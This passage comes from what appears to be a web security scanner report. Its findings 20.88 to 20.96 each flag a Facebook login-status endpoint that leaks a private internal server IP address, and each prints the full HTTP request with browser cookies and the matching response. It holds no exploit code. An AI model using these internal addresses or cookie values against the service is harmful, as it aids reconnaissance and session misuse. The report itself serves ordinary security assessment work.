a034%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df85d88918&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dffaef470c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1b85da034%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df85d88918&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3d9837ddc&origin=http%3A%2F%2Faol.sportingnews.com%2Ff1b85da034&relation=parent&transport=postmessage&frame=f85d88918
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.136.132
X-Cnection: close
Date: Thu, 05 May 2011 02:16:38 GMT
Content-Length: 0


20.88. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.210.65

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3da1a035c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff257a12eac%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2de7dba74%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff257a12eac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff50c8b3%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df942f6194%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff257a12eac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff50c8b3&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df210482be%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff257a12eac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff50c8b3&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1811cb138%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff257a12eac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff50c8b3&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f210482be&origin=http%3A%2F%2Faol.sportingnews.com%2Ff257a12eac&relation=parent&transport=postmessage&frame=ff50c8b3
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.210.65
X-Cnection: close
Date: Thu, 05 May 2011 01:58:25 GMT
Content-Length: 0


20.89. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.167.61

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df36784567c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff36e8a4c3%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2efbed5ec%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff36e8a4c3%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30638ba1%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2fc8d941%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff36e8a4c3%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30638ba1&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df20a29bdf%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff36e8a4c3%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30638ba1&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df259b2f898%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff36e8a4c3%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30638ba1&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f20a29bdf&origin=http%3A%2F%2Faol.sportingnews.com%2Ff36e8a4c3&relation=parent&transport=postmessage&frame=f30638ba1
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.167.61
X-Cnection: close
Date: Thu, 05 May 2011 01:23:41 GMT
Content-Length: 0


20.90. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.108.102

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df339156848%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3af2f9734%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df24fc8a95%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3af2f9734%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc79c2bcc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3b30b2c98%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3af2f9734%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc79c2bcc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df15ee219cc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3af2f9734%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc79c2bcc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df183cdc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3af2f9734%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc79c2bcc&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f15ee219cc&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3af2f9734&relation=parent&transport=postmessage&frame=fc79c2bcc
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.108.102
X-Cnection: close
Date: Thu, 05 May 2011 01:09:52 GMT
Content-Length: 0


20.91. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.139.120

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df23490dec8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3306696ec%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df204dba704%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3306696ec%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df35a02d11%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1b6855fe4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3306696ec%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df35a02d11&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df265a7%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3306696ec%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df35a02d11&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df14625b68c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3306696ec%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df35a02d11&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f265a7&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3306696ec&relation=parent&transport=postmessage&frame=f35a02d11
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.139.120
X-Cnection: close
Date: Thu, 05 May 2011 02:19:13 GMT
Content-Length: 0


20.92. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.138.102

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3950f37b8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff36499466%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2945e9c68%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff36499466%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3d8e44b68%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df21f7ec568%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff36499466%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3d8e44b68&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d570b96c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff36499466%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3d8e44b68&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1bd87fbb8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff36499466%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3d8e44b68&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2d570b96c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff36499466&relation=parent&transport=postmessage&frame=f3d8e44b68
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.138.102
X-Cnection: close
Date: Thu, 05 May 2011 01:59:45 GMT
Content-Length: 0


20.93. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.42.96.77

Request

GET /extern/login_status.php?api_key=47c6f1cfdf79ef9c669f1beb89b3e598&app_id=47c6f1cfdf79ef9c669f1beb89b3e598&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df4b99ee0%26origin%3Dhttp%253A%252F%252Fwww.truveo.com%252Ff192839764%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfe25b524c%26origin%3Dhttp%253A%252F%252Fwww.truveo.com%252Ff192839764%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11f5dcd84%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df27fcb7b5c%26origin%3Dhttp%253A%252F%252Fwww.truveo.com%252Ff192839764%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11f5dcd84&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df38b20c288%26origin%3Dhttp%253A%252F%252Fwww.truveo.com%252Ff192839764%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11f5dcd84&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df37906661%26origin%3Dhttp%253A%252F%252Fwww.truveo.com%252Ff192839764%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11f5dcd84&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.truveo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f38b20c288&origin=http%3A%2F%2Fwww.truveo.com%2Ff192839764&relation=parent&transport=postmessage&frame=f11f5dcd84
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.96.77
X-Cnection: close
Date: Thu, 05 May 2011 00:57:34 GMT
Content-Length: 0


20.94. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.43.72.51

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1023a5e3c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1bc0499%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfb7ae2db8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1bc0499%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df153d75394%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b19ccb94%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1bc0499%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df153d75394&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df358ac1c84%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1bc0499%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df153d75394&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a38fa2c8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1bc0499%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df153d75394&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f358ac1c84&origin=http%3A%2F%2Faol.sportingnews.com%2Ff1bc0499&relation=parent&transport=postmessage&frame=f153d75394
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.72.51
X-Cnection: close
Date: Thu, 05 May 2011 01:19:44 GMT
Content-Length: 0


20.95. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.42.92.51

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df9b83f09%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffc5cfad9c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dff153201%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffc5cfad9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5683d23%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3ea16fab8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffc5cfad9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5683d23&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df272ff1874%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffc5cfad9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5683d23&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df11ea1449c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffc5cfad9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5683d23&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f272ff1874&origin=http%3A%2F%2Faol.sportingnews.com%2Ffc5cfad9c&relation=parent&transport=postmessage&frame=f5683d23
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.92.51
X-Cnection: close
Date: Thu, 05 May 2011 01:19:37 GMT
Content-Length: 0


20.96. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.174.36

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df32447efb8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffb79ca0e8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3b74f3024%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffb79ca0e8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df367d5ac9c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13d85d7f8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffb79ca0e8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df367d5ac9c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df266f11478%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffb79ca0e8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df367d5ac9c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3eb8e8d1%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffb79ca0e8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df367d5ac9c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
